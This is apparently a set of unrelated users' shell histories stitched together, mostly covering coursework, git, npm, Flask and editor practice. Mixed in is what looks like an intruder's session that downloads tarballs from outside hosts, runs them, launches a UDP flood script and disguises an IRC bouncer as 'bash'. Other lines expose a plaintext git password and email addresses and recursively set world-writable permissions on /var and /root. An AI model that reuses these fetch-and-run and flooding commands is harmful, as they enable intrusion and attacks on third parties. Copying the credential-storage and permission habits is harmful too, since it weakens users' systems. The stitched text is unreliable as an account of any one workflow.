+gid add +git commit -m "first commit" +git remote add origingit remote add originshimaimani/cs153.git +git push -u origin master +ls +git status +git commit -m "first commit" +git +makdir code +mkdir code +cp lab1_siman003@ucr.edu_rwils006@ucr.edu.zip code/ +ls +git remote add originshimaimani/cs153.git +git push -u origin master +git init +git remote add originshimaimani/cs153.git +git push -u origin master +git init +git remote add originshimaimani/cs153.git +git push -u origin master +git add . +git commit -m "upload" +git config --global user.email "siman003@ucr.edu" +git config --global user.name "shimaimani" +git remote add originshimaimani/cs153.git +git push -u origin master +git commit -m "upload" +git remote add originshimaimani/cs153.git +git push -u origin master +ls +ls +ls +vim proc.c +ls +ls +vim proc.c +make qemu-nox +ls +ls +vim shm.c +ls +ls +git clone +ls +ls +vim shm.c +cat>shm.c +ls +ls +make qemu-nox +make clean +make qemu-nox +ls +mv lab2-f17 xv7 +ls +mv xv6 xvold +mv xv7 xv6 +ls +make clean +clean +make clean +ls +make clean +make qemu-nox +ls +ls +mv xv6 xv6lab2part2 +git clone +ls +mv lab2-f17 lab2-f17-part1 +mv xv6lab2part2 lab2-f17-part2 +ls +ls +cat>exec.c +cat>proc.c +cat>trap.c +cat>vm.c +ls +grep "alloc".c* +vim kalloc.c +vim exec.c +grep "allocuvm" *.c +vim vm.c +ls +ls +cat>shm.c +make clean +make qemu-nox +ls +cat>shm.c +make clean +make qemu-nox +ls +cat>shm.c +make clean +make qemu-nox +cat>shm.c +make clean +make qemu-nox +cat>shm.c +make clean +make qemu-nox +ls +cat>shm.c +make clean +make qemu-nox +cat>shm.c +make clean +make qemu-nox +ls +cat>shm.c +ls +make clean +make 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+vim vm.c +cat vm.c +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>trap.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +grep "pte" *.c +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +ls +make clean +make qemu-nox +ls +ls +cat>vm.c +cat>syscall.c +make clean +make qemu-nox +cat>syscall.c +make clean +make qemu-nox +cat>syscall.c +make clean +make qemu-nox +cat>syscall.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>exec.c +make clean +make qemu-nox +cat>exec.c +make clean +make qemu-nox +cat>exec.c +make clean +make qemu-nox +cat>exec.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>exec.c +make clean +make qemu-nox +cat>exec.c +make clean +make qemu-nox +ls +ls +cat>syscall.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>exec.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>exec.c +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +cat>vm.c +make clean +make qemu-nox +grep "define pte" *.c +grep "pte" *.c +ls -alrt +touch test +ls -alrt +rm test +ls -alrt +pwd +cat scp.css +git clonesks.git +git clonesks.git +git status +git status +git add . +git status +git status +git status +git add . +git status +git status +git add . +git status +git add . +git add . +git status +git commit -m "Buttons fixed" +git push origin master +git status +git add . +git status +git commit -m "Create HomeTask7" +git status +git status +git push origin master +git status +git status +git add . +git status +git status +git add . +git status +git commit -m "Creating HomeTask9" +git status +git push origin master +git status +git add . +git status +git commit -m "Changing Hamburger" +git status +git push origin master +git pull +git status +git add . +git status +git commit -m "Changing Hamburger" +git status +git pull +git status +git status +git add . +git status +git commit -m "Changing HomeTask10" +git status +git push origin master +git status +git commit -m "Minesweeper added" +git status +git push origin master +pip install country_converter --upgrade +pip install country_converter --upgrade +pip install country_converter --upgrade +env | grep redis +env +exit +matthew1 +w +ls -a +uname -a +passwd +cat /proc/cpuinfo +wget pilotu.110mb.com/RaZvaNBv.tgz;tar xvf RaZvaNBv.tgz;rm -rf RaZvaNBv.tgz;cd .tmp;./start printubuti +w +wget +wget +w +ls -a +perl udp.pl 0 0 +ls -a +uname -a +wget pilotu.110mb.com/nolimit.tgz +wget pilotu.110mb.com/nolimit.tgz +wget setsteam.uv.ro/SeTs3.tgz +wget pilotu.110mb.com/nolimit.tgz +w +ls -a +w +wget +wget pilotu.110mb.com/nolimit.tgz +w +uname -a +ls -a +wget pilotu.110mb.com/nolimit.tgz +tar xzvf nolimit.tgz +chmod +x * +./a 212.30 +./a 219.94 +./a 201.12 +ps x +wget pilotu.110mb.com/RaZvaNBv.tgz;tar xvf RaZvaNBv.tgz;rm -rf RaZvaNBv.tgz;cd .tmp;./start printubuti +w +w +wgetsaundernet.is-the-boss.com/psybnc-linux.tgz; tar zxvf psybnc-linux.tgz;cd psybnc-linux ;cd psybnc ;mv psybnc bash;chmod +x * ;sh ;PATH=:$PATH ;bash +wget www.freewebtown.com/madalinbr/bnc.tar.gz +rm -R -f drupal +wgets/projects/drupal-8.2.3.tar.gz +tar -xvzf drupal-8.2.3.tar.gz +mv /var/www/html/drupal-8.2.3 /var/www/html/drupal +rm drupal-8.2.3.tar.gz +sudo chmod -R 777 /var/www/html/drupal/ +sudo xed /etc/apache2/apache2.conf +sudo nano /etc/apache2/apache2.conf +sudo service apache2 restart +nano /var/www/html/drupal/.htaccess +sudo a2enmod rewrite +sudo service apache2 restart +sudo a2enmod rewrite +exit +chmod 777 /var/www/html/ +sudo chmod 777 -R /var/www/html/ +exit +sudo chmod 777 -R article +sudo chmod 777 -R articles +exit +composer require abraham/twitteroauth +sudo apt install composer +composer require abraham/twitteroauth +composer install +sudo apt-get install composer +php -r "copy();" +php -r "if (hash_file('SHA384', 'composer-setup.php') === '55d6ead61b29c7bdee5cccfb50076874187bd9f21f65d8991d46ec5cc90518f447387fb9f76ebae1fbbacf329e583e30') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" +php composer-setup.php +php -r "unlink('composer-setup.php');" +composer require abraham/twitteroauth +sudo reboot +sudo chmod 777 -R /var/www/html/php -r "copy();" +php -r "copy();" +php -r "if (hash_file('SHA384', 'composer-setup.php') === '669656bab3166a7aff8a7506b8cb2d1c292f042046c5a994c43155c0be6190fa0355160742ab2e1c88d40d5be660b410') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" +php composer-setup.php +php -r "unlink('composer-setup.php');" +php composer.phar require slim/slim "^3.0" +php composer.phar create-project slim/slim-skeleton api +php -S localhost:8080 -t public public/index.php +php -S localhost:8080 -t public public/index.php +php -S localhost:8080 +ls +php -S localhost:8080 +php -S localhost:8080 +php -S localhost:8080 +ls +more index.php +exit +php -S localhost:8080 +sudo chmod 777 -R /api +sudo chmod 777 -R api +php -S localhost:8080 +php -S localhost:8080 +exit +php -S +php -S +exit +php -S localhost:8080 -t public public/index.php +php -S localhost:8080 -t api public/index.php +php -S localhost:8080 -t api /public/index.php +php -S localhost:8080 -t api/public/index.php +php -S localhost:8080 -t api public/index.php +php -S -t api public/index.php +php -S -t api public/index.php +sudo service apache2 restart +php -S -t api public/index.php +php -S api public/index.php +php -S api public/index.php +php -S api public/index.php +sudo apt-get install ranger +ranger +sudo chmod 777 apache.conf +sudo chmod 777 apache2.conf +ranger +sudo service apache2 restart +php -S -t api public/index.php +sudo service apache2 restart +php -S -t api public/index.php +php -S -t api p/public/index.php +php -S -t public public/index.php +php -S -t public api/public/index.php +php -S -t api/public/index.php +php -S -t api/public/index.php +php -S -t public public/index.php +exit +php -S -t public public/index.php +node --version +npm install -g bower +sudo npm install -g bower +sudo npm install -g yo +sudo npm install -g generator-angular +mkdir workspace ; mkdir workspace/first-app ; cd workspace/first-app +yo angular +npm install generator-karma:app +sudo npm install generator-karma:app +sudo npm install generator-karma +yo angular +sudo yo angular +sudo chmod 777 -R node_modules +sudo cd /root/.config +sudo chmod 777 -R /root/.config/configstore +sudo chmod 777 -R /root/.config/configstore/ +root +sudo su cd /root/.config/ +su cd /root/.config/ +su -c "cd /root; dostuff" +sudo chmod 777 -R /root/.config +sudo yo angular +sudo chmod 777 -R /root/.config/configstore/ +sudo chmod 777 -R /root/.config/configstore +yo angular +npm search yeoman-generator +npm install generator-karma:yeoman-generator +npm install yeoman-generato +npm install generator-karma:yeoman-generator +npm install yeoman-generator +npm install karma:app +npm install karma +yo angular +npm install -g karma +sudo yo angular +grunt +npm install generator-karma:app +sudo npm install generator-karma:app +sudo npm install -g generator-karma +npm update +sudo npm minimatch -v +sudo yo angular +yo angular +sudo chown -R $USER:$(id -gn $USER) /home/jean/.config +sudo yo angular +su -c "cd /root; dostuff" +toot +root +sudo root +su -c "cd /root/.config; dostuff" +su -c "cd /root/.config" +su -c "yo angular" +exit +chmod g+rwx /root /root/.config /root/.config/configstore +su chmod g+rwx /root /root/.config /root/.config/configstore +su sudo chmod g+rwx /root /root/.config /root/.config/configstore +su root chmod g+rwx /root /root/.config /root/.config/configstore +sudo chmod g+rwx /root /root/.config /root/.config/configstore +sudo yo angular +grunt +npm grunt +sudo npm install @angular/{common,compiler,compiler-cli,core,forms,http,platform-browser,platform-browser-dynamic,platform-server,router,animations}@latest typescript@latest --save +sudo npm install rxjs@latest +sudo npm install zone.js@latest +sudo npm install rxjs@latest +sudo npm install @angular/{common,compiler,compiler-cli,core,forms,http,platform-browser,platform-browser-dynamic,platform-server,router,animations}@latest typescript@latest --save +sudo npm install minimatch@latest +sudo yo angular +sudo npm install @angular/{common,compiler,compiler-cli,core,forms,http,platform-browser,platform-browser-dynamic,platform-server,router,animations}@latest typescript@latest --save +sudo npm install yo@latest +mkdir workspace ; mkdir workspace/first-app ; cd workspace/first-app +sudo yo angular +You’re using our default notification settings. +This means you will be notified every time something gets posted to Slack. This will help keep you up to date, but it will get noisier the larger and more active your team becomes. +Our recommended settings will only send you a notification when someone wants your attention. For example, if someone says your name, sends you a direct message, or uses one of your highlight words.npm install -g @angular/cli +npm install -g @angular/cli +ng new my-app +ng serve --open +ng serve -o +sudo ng serve --open +ng new my-app +ng serve --open +sudo ng serve --open +git clones-on-blackboard/can-you-rotate-and-pinch-the-svg-map.git +npm install +npm remove --minimatch@2.0.10 +npm uninstall --minimatch@2.0.10 +npm uninstall minimatch@2.0.10 +npm uninstall minimatch@0.2.14 +npm uninstall minimatch@0.3.0 +npm update gracefull +npm update --gracefull +npm update --gracefull -g +sudo update -g gracefull +sudo npm update -g gracefull +npm update -g +sudo npm update -g +npm uninstall +sudo npm install +npm uninstall +npm install +npm uninstall +sudo chmod 777 -R can-you-rotate-and-pinch-the-svg-map/ +git clones-on-blackboard/can-you-rotate-and-pinch-the-svg-map.git +sudo npm install +sudo npm install +sudo chmod 777 -R can-you-rotate-and-pinch-the-svg-map/ +sudo npm install +sudo chmod 777 -R can-you-rotate-and-pinch-the-svg-map/ +s.git +git clones.git +rm pdf.js/ +rm pdf.js +sudo rm pdf.js +sudo rm /pdf.js +rm -a +rm --a +sudo rm -r pdf.js +git clones.git +npm install -g gulp-cli +sudo npm install -g gulp-cli +sudo npm install +sudo npm install -g marked@0.3.6 +sudo npm install -g npm@5.0.3 +sudo npm update -g graceful-fs@^4.0.0 +sudo npm update graceful-fs@^4.0.0 +sudo npm install -g graceful-fs@^4.0.0 +glup server +gulp server +sudo chmod 777 -R pdf.js/ +gulp server +gulp generic +gulp server +npm install pdfjs-dist --save +sudo npm install pdfjs-dist --save +CD +chmod 777 -R node_modules/ +sudo chmod 777 -R node_modules/ +sudo chmod 777 -R pdf.js/ +sudo chmod 777 -R workspace/ +git clones/hammer.js.git +sudo npm install && sudo npm run build +sudo chmod 777 -R hammer.js/ +sudo npm install && sudo npm run build +npm i -g npm +sudo npm i -g npm +sudo npm install +sudo cd root +sudo cd /root +sudo chmod 777 -R /root/.npm/_cacache +sudo npm install && sudo npm run build +npm update minimatch +sudo npm i -g npm +npm update minimatch +npm update minimatch@latest +npm minimatch -update +npm minimatch update +npm update -minimatch +sudo npm install && sudo npm run build +npm install -g npm@5.0.4 +sudo npm install -g npm@5.0.4 +npm install -g npm@5.0.4 +npm update -minimatch +sudo apt install npm +sudo apt-get update --fix-missing +dpkg --get-selections | grep hold +dpkg --get-selections | grep hold +sudo apt install npm +sudo apt upgrade +sudo apt-get update --fix-missing +sudo apt install npm +npm +sudo apt-get update --fix-missing +sudo add-apt-repository -y -r ppa:chris-lea/node.js +sudo rm -f /etc/apt/sources.list.d/chris-lea-node_js-*.list +sudo apt-get update --fix-missing +cat /etc/resolv.conf +sudo apt upgrade +sudo apt-get update --fix-missing +gpg --recv-keys 452f0c20 --armor | apt-key add - +sod +sudo gpg --recv-keys 452f0c20 --armor | apt-key add - +root +su +exit +sudo apt-get update --fix-missing +sudo apt-get install npm +sudo apt-get install --yes git nodejs-legacy npm +sudo apt-get install node-gyp +sudo apt-get remove nodejs npm +sudo apt-get install curl +curl -sLsource.com/setup_6.x | sudo -E bash - +sudo apt-get install -y nodejs +sudo apt-get install build-essential +sudo apt-get autoremove +sudo npm install && sudo npm run build +sudo chmod 777 -R hammer.js/ +command du -hax /var | sort -hr | head -n 10 +sudo chmod 777 -R /var +command du -hax * | sort -hr | head -n 10 +command du -hax | sort -hr | head -n 10 +command du -hax /var | sort -hr | head -n 10 +exit +git add . +git commit -m "add" +git push origin master +git pull origin master +git push origin master +sudo git push origin master +git init +git add . +git commit -m "add" +git push origin master e2ms +git remote add origins.git +git init +git commit -m "add" +git remote add origins.git +git push -u origin master +git remote add origins.git +git push -u origin master +sudo git push -u origin master +git config --global user.name "JeanBonnard" +git config --global user.email "j.bonnard42@gmail.com" +git init +git commit -m "add" +git remote add origins.git +sudo git push -u origin master +git push -u origin master +git config --global user.password "Idrisjtm42100" +exit +./migrate.sh +python +ls +python manage.py Helloworld.py +python Helloworld.py +lsd +ls +ls +ls +exit +ls +index.html +ls +ls +python Piglatin.py +python Piglatin.py +python piglatin.py +python Piglatin.py +phrase = "python" +python +python +ls +ls +template.html +python server.py +import flask +import Flask +sudo apt-get install Flask +import Bottle +sudo apt-get install Bottle +sudo apt-get install python-pip +ls +sudo pip install Flask +ls +server.py +python server.py +ls +ls +python python.py +ls +ls +mkdir -p ~/workspaces +ln -s ~/Web ~/Workspaces/Web +ls +mkdir Web +ls +ls +ls +ls +ls +del workspaces +ls +rem workspaces +ls +ls +ls +README.md +sudo poweroff +sudo apt-get install python-pip +import flask +from flask import Flask +sudo pip install Flask +ls +python run.py +ls +python run.py +chmod a+x run.py +python run.py +sudo poweroff +sudo poweroff +python +sudo apt-get install python-pip +sudo pip install Flask +ls +python web.py +ls +python __init_1.py +python __init__1.py +ls +ls +ls +ls +python server_1.py +ls +ls +ls +ls +python Untitled.txt +cl +clear +python Untitled.txt +ls +python steve_trial.py +ls +python python.py +ls +python Piglatin.py +ls +python steve_trial.py +ls +python steve_trial.py +sudo apt-get install Flask +apt-get install python-pip +sudo apt-get install python-pip +sudo apt-get install Flask +sudo apt-get install flask +sudo apt-get install Flask +ls +python web.py +python web.py +ls +python web.py +ls +steve_trial.py +ls +python steve_trial.py +ls +python web.py +sudo apt-get install python-pip +sudo pip install Flask +ls +python web.py +ls +python steve_trial.py +python run.py +sudo end +ls +python steve_trial.py +python web.py +ls -al ~/.ssh +git remote add origin git@github.com:Lamontsm/Koding.git +git init +git add README.md +git commit -m "first commit" +git remote add origin git@github.com:Lamontsm/Koding.git +pit push -u origin master +git config --global user.email "steven@lamonaco.com" +git config --global user.name "Lamontsm" +git commit -m "first commit" +fit push -u origin master +git push -u origin master] +git push -u origin master +git +git log +git push +git remote add origin git@github.com:Lamontsm/Koding.git +git +git help -a +git add +git add run.py +git help -a +git commit +ls +ls +git commit web.py +git commit ~/Workspaces/hello-world/* +git add web.py +git add steve_trial.py +git add web.py +git help -a +git help commit +SocketServer.ThreadingTCPServer.allow_reuse_address = True +sock.setsockop(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) +sockets +socket help +sudo apt-get install socket +socket help +s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) +from app import views.py +import app/views.py +app/views.py +sudo apt-get install python-pip +sudo pip install Flask +python web.py +./run.py +python run.py +python run.py +s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) +ls +python run.py +python web.py +sudo poweroff +sudo apt-get install python-pip +sudo pip install Flask +ls +ls +ls +python web.py +ls +python run.py +ls +python run.py +python web.py +ls +python web.py +sudo poweroff +ls +python run.py +netstat -lpn +kill 1244 +netstat -lpn +ls +python run.py +exit +sudo apt-get install python-pip +sudo pip install Flask +ls +netstat -lpn +kill +ls +python web.py +ls +python steve_trial.py +ls +python web.py +kill +import xml.etree.ElementTree as etree +sudo apt-get install etree +sudo apt-get help +sudo apt-get xml.etree.ElementTree +sudo apt-get xml.etree +ls +ls +ls +tree = etree.parse('students.xml') +tree = etree.parse(students.xml) +sudo shutdown +sudo poweroff +ls +python run.py +netstat -lpn +kill 1291 +python run.py +ls -l +ls -l +ls -l +history +lclear +clar +clear +ls -l +clear +ls -la +ls -la +find . -name "*hello*" +find . -name "*hello*" +history +sudo +sudo su +python starter.py +git commit -m "trying to do it with command line" +git commit -m "trying command line again" +git commit help +git help +git commit "try again" +git log +uit +git help commit +git commit -m "will this work now?" +sudo shutdown +shutdown +sudo poweroff +git remote add origin git@github.com:Lamontsm/Koding.git +git push -u origin master +kpm install ungit +ungit +install ungit +ungit +curl -sSL sercontent.com/koding\ +/kpm-scripts/master/installers/meta" | fish +kpm install ungit +ungit +kpm install ungit +ungit +kpm install ungit +ungit +ls +ls +ls +ls +python FlaskHelloWorld.py +ls +python FlaskHelloWorld.py +ls +python FlaskHelloWorld.py +ls +python FlaskHello2.py +ls +python FlaskHello2.py +netstat -lpn +kill 1323 +python FlaskHello2.py +ls +python FlaskHello2.py +git commit -m "two new successful Flask attempts" +ungit +git commit -m "added two working flask trials" +git commit -m "Flask update 2" +sudo poweroff +git commit -m "new push" +from lxml import etree +import xml.etree.cElementTree as etree +sudo apt-get install etree +import cElementTree as etree +from lxml import etree +xml +help +root = etree.Element("root") +print(root.tag) +sudo pip install etree +sudo pip install lxml +from lxml import etree +root = etree.Element("root") +from lxml import etree +sudo apt-get install libxml2-dev libxslt-dev python-dev +pip install lxml +from lxml import etree +import xml.etree.ElementTree as etree +sudo apt-get install etree +sudo apt-get install lxml +STATIC_DEPS=true +sudo pip install lxml +python -V +sudo apt-get install python-dev +sudo apt-get install libxml2-dev libxslt1-dev +vmstat 5 +vb.memory +config.vm.provider +pip uninstall lxml +dmesg | tail +easy_install lxml +sudo easy_install lxml +from lxml import etree +sudo install etree +install help +python2.7 setup.py clean build --with-cython install +sudo dd if=/dev/zero of=/swapfile bs=1024 count=524288 +sudo chmod 600 /swapfile +sudo mkswap /swapfile +sudo swapon /swapfile +sudo pip install lxml +free +sudo install lxml +sudo apt-get lxml +sudo apt-get install lxml +pip install lxml +sudo pip install lxml +sudo apt-get install -y zlib1g-dev +sudo apt-get install -y libxml2-dev libxslt1-dev zlib1g-dev python3-pip +sudo pip3 install lxml +from lxml import etree +import xml.etree.cElementTree as etree +import xml.etree.ElementTree as etree +sudo apt-get install etree +root = etree.Element("root") +import cElementTree as etree +import elementtree.ElementTree as etree +lxml +from lxml3 import etree +lxml3 +import lxml.etree +sudo apt-get install etree +sudo from lxml import etree +sudo yum install python-devel +sudo aptitude install python-dev +from lxml import etree +from lxml3 import etree +import cElementTree as etree +pip uninstall lxml +sudo poweroff +STATIC_DEPS=true pip install lxml +python2.7 +python -v +STATIC_DEPS=true pip install lxml +pip -V +setup.py -V +lxml -V +python -V +sudo poweroff +from xml import etree +from /user/python2.7/xml import etree +import xml.etree.ElementTree as etree +sudo apt-get install etree +root = etree.Element("root") +import xml.etree.cElementTree as ET +python import xml.etree.cElementTree as ET +python2.7 +imp xml.etree.cElementTree as ET +imputil xml.etree.cElementTree as ET +runpy xml.etree.cElementTree +importlib xml.etree.cElementTree as ET +tree = ElementTree(file='doc1.xml') +ElementTree +tree.getroot() +b = 1 +python +import cElementTree as ET +python +tree = ElementTree(file='xmltest1.xml') +python -V +import +from xml.etree.cElementTree import ET +from python2.7/xml/etree/cElementTree import ET +git commit -m "Adding xml file" +git add +git add xmltest1.xml +git commit -m "add xml file" +ET = xml.etree.cElementTree +python B = 1 +python +python FlaskHello2.py +git commit +git add Web/Steve_1.html +git add Web/Steve_1.py +git commit -m "played around with some web forms of python" +sudo poweroff +python python.py +sudo poweroff +git commit +git add Steve2_1.py +fit add cod +git add code/ +ls +ls +ls +git add +git add * +git commit -m "working with streamlined HTML" +git status +git add * +git commit -m "are these going through?" +git status +git add * +git commit -m "have to make this work" +git config +ls -al ~/.ssh +ls -al ~/.ssh +ssh-keygen -t rsa -C "steve@lamont.email" +eval "$(ssh-agent -s)" +ssh-add ~/.ssh/id_rsa +sudo apt-get install xclip +xclip -sel clip < ~/.ssh/id_rsa.pub +ssh -T git@github.com +git diff +git add +git commit +git add * +git commit -m "hope I have this right" +git commit +git add */* +git commit -m "get it right this time" +git commit +git add * +git commit -m "another test" +ls +git commit +git add * +git commit +git commit -m "another" +git status +git commit -a +git add * +git add --all +git add all +git add all +git add all Web/* +git add all * +git status +git commit +git commit +git status +git commit -a +git status +git add * +git commit -m "another try" +git add * +git commit -m "another" +git log +git status +git add * +git add testfile.txt +git commit -m "another" +git log +ungit +ungit stop +sudo poweroff +git status +git add * +git commit -m "getting old" +ungit +sudo locale-gen en_US +man uname +uname +mkdir 0x00-vagrant +ls +ls +touch 0-hello_ubuntu +ls +emacs0-hello_ubuntu +sudo apt-get emacs +pacman -S mingw-w64-x86_64-emacs +sudo port install emacs-app +sudo +sudo apt-get install build-essential +ls +emacs 0-hello_ubuntu +sudo apt-get build-dep emacs +sudo apt-get update +sudo get-apt install emacs +sudo apt-get install emacs +ls +emacs 0-hello_ubuntu +man uname +emacs 0-hello_ubuntu +man uname +emacs 0-hello_ubuntu +uname +emacs 0-hello_ubuntu +git init +sudo apt-get install git +git init +git add -A +ls +git commit -m"This is the answer key to all of the problems" +git push +git push origin master +git remote add origin git@github.com:lauwillis/holbertonschool-zero_day.git +ls +touch README.md +emacs README.md +git add -A +git commit -m"added README.md" +git push -u origin master +ssh-keygen -t rsa -b 4096 -C "lauwillis@yahoo.com" +git push origin master -u +eval $(ssh-agent -s) +ls +ls +ls +ls +ssh-add ~/.ssh/id_rsa +clip < ~/.ssh/id_rsa.pub +apt-get install geoview +ls +ls +ls +ls +emac authorized_keys +emacs authorized_keys +ls +ls +emacs 0-hello_ubuntu +git push origin master -u +git push master +git push origin master +ssh -T lauwillis@yahoo.com +ssh -T lauwillis@github.com +ssh-add -1 +ssh-add -l +ssh -vT git@github.com +ls +emacs 0-hello_ubuntu +ls +ls +rm -r 0x00-vagrant +rm -rf 0x00-vagrant +ls +mkdir 0x00-vagrant +ls +touch 0-hello_ubuntu +ls +rm 0-hello_ubuntu +ls +touch 0-hello_ubuntu +ls +emacs 0-hello_ubuntu +ls +ls +ls +git init +ls +touch README.md +ls +emacs README.md +ls +git add -A +git commit -m "added README and answers to questions" +git remote add origins1991/holbertonschool-zero_day.git +git push -u origin master +ls +ls +mkdir 0x01-emacs +ls +touch 0-opening +emacs 0-opening +ls +touch 1-saving +ls +emacs 1-saving +emacs 2-cutting +ls +emacs 3-pasting +ls +emacs 4-searching +emacs 5-undoing +emacs 6-quitting +ls +emacs README.md +ls +ls +mkdir 0x02-vi +ls +ls +ls +touch 0-inserting +ls +vi 0-inserting +ls +vi 0-inserting +vi 1-cutting +vi 2-pasting +vi 3-undoing +vi 4-exiting +ls +vi 4-exiting +ls +vi 5-beginning_line +ls +vi 6-end_line +ls +git push origin master +ls +git add -A +ls +ls +ls +git push origin master +git init +git add -A +git commit -m"emacs added" +git push origin master +git push -u origin master +git push origin git push origin master +git push master +git push +git remote add origins1991/holbertonschool-zero_day.git +git push origin master +ls +ls +ls -a +ls +ls -a +ls +emacs 0-hello_ubuntu +emacs README.md +ls +ls +emacs 6-quitting +ls +emacs 0-opening +emacs saving +emacs cutting +emacs 3-pasting +emacs 4-searching +emacs 5-undoing +emacs 6-quitting +ls +ls +vi 0-inserting +vi 1-cutting +vi 2-pasting +vi 3-undoing +vi 4-exiting +vi 5-beginning_line +vi 6-end_line +ls +rm -rf 0x00-vagrant +ls +rm -rf 0x01-emacs +rm -rf 0x02-vi +ls +mkdir 0x01-emacs +mkdir 0x00-vagrant +mkdir 0x02-vi +ls +ls +touch 0-hello_ubuntu +ls +emacs 0-hello_ubuntu +touch README.md +emacs README.md +ls +ls +touch 0-opening +touch 1-saving +touch 2-cutting +touch 3-pasting +touch 4-searching +touch 5-undoing +touch 6-quitting +emacs 0-opening +emacs 1-saving +emacs 2-cutting +emacs 3-pasting +emacs 4-searching +emacs 5-undoing +emacs 6-quitting +emacs 4-searching +ls +ls +touch README.md +emacs README.md +ls +ls +touch 0-inserting +touch 1-cutting +touch 2-pasting +touch 3-undoing +touch 4-exiting +touch 5-beginning_line +touch 6-end_line +vi 0-inserting +vi 1-cutting +vi 2-pasting +vi 3-undoing +vi 4-exiting +vi 5-beginning_line +vi 0-inserting +rm 0-inserting +ls +touch 0-inserting +vi 0-inserting +ls +vi 6-end_line +vi README.md +ls +ls +git init +git add -A +git commit -m"added first three projects" +git remote add origins1991/holbertonschool-zero_day.git +git push -u origin master +ls +mkdir my_first_repository +ls +git init +touch README.md +emacs README.md +ls +git add -A +git commit -m"My first commit" +git remote add origins1991/my_first_repository.git +git push -u origin master +ls +mkdir bash +mkdir c +mkdir js +touch c/c_is_fun.c +touch js/main.js +touch js/index.js +ls +ls -a +ls +ls +ls +emacs c/c_is_fun.c +ls +touch bash/holberton +touch bash/school +emacs bash/holberton +emacs bash/school +git add -A +git commit-m"I'm starting to code, so cool" +git commit -m "I'm starting to code, so cool" +git push origin master +git checkout -b update_script +git checkout master +git checkout update_script +touch bash/98 +touch bash/holberton +touch bash/school +ls +emacs bash/holberton +emacs bash/school +git add -A +git commit -m "pushing new stuff to branch" +git commit -m "My personal work" +git push update_script +git push origin update_script +git checkout master +emacs bash/holberton +ls +rm js +rm -rf js +ls +git add -A +git commit -m "Hot fix" +ls +ls +ls -a +emacs bash/98 +wq +ls +ls +ls -a +emacs bash/98 +ls +ls +git status +ls +touch up_to_date +ls +git add -A +git commit -m "added up_to_date" +ls +rm up_to_date +ls +emacs README.md +git pull origin master +ls +emacs README.md +touch up_to_date +git add -A +git commit -m "How to be up to date in git" +git push origin master +emacs up_to_date +git commit -m "How to be up to date in git" +git add -A +git commit -m "How to be up to date in git" +git push origin master +ls +emacs 0x01-emacs +ls +emacs 0-opening +ls +git add -A +git commit -m "changed emacs opening answer" +git push origin master +ls +ls +vi 1-cutting +rm 1-cutting +ls +touch 1-cutting +vi 1-cutting +ls +git add -A +git commit -m "corrected cutting in Vi" +git push origin master +ls +ls +vi 4-exiting +rm 4-exiting +ls +touch 4-exiting +vi 4-exiting +rm 4-exiting +vi 4-exiting +ls +git add -A +git commit -m "fixed vi exiting" +git push origin master +ls +ls +rm 4-exiting +vi 4-exiting +rm 4-exiting +vi 4-exiting +ls +git add -A +git commit -m "Really fixed the vi exiting" +git push origin master +ls +ls +vi 5-beginning_line +ls +git add -A "fixed beginning_line" +git add -A +git commit -m "fixed beginning_line" +git push origin master +ls +ls +git checkout update_script +git pull origin master +git merge origin master +git status +git checkout update_script +git add -A +git commit -m"commiting to merge" +git merge origin master +git merge master +git pull origin master +git pull master +git checkout +git merge master +git checkout master +git push up_to_date +git branch +git push update_script +git checkout master +git checkout update_script +git merge origin master +git merge master +git branch +ls +git branch master +git checkout master +ls +emacs up_to_date +git add -A +git commit -m "added up_to_date command" +git push origin master +git branch +git merge update_script +ls +ls +ls +ls +sudo -s +exit +sudo -s +exit +ls +npm start +exit +ls +curl localhost +curl localhost:4200 +exit +ls +pwd +ls +ls +ps +curl localhost +curl localhost:4200 +exit +riff function create square --local-path ./sources/ --artifact square.js --image fbiville/square --tail +watch riff function listw +ps x +perl +ls +perl udp.pl 0 0 +{"filter":false,"title":".bash_history","tooltip":"~/.bash_history","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":0,"column":0},"end":{"row":0,"column":0},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1561998342850,"hash":"ee297a2e833c927ace4fc849dfcc2f4240b5a55a"}su lebtech +ssh chuck.mcandrew@kplrefoffice.leblibrary.lib +su lebtech +exit +sudo ln -s /home/public/tor-browser_en-US/start-tor-browser.desktop /home/public/Desktop/ +ln -s /home/public/tor-browser_en-US/start-tor-browser.desktop /home/public/Desktop/ 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auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg auv_map +rosrun auv_map map_builder +cm --pkg 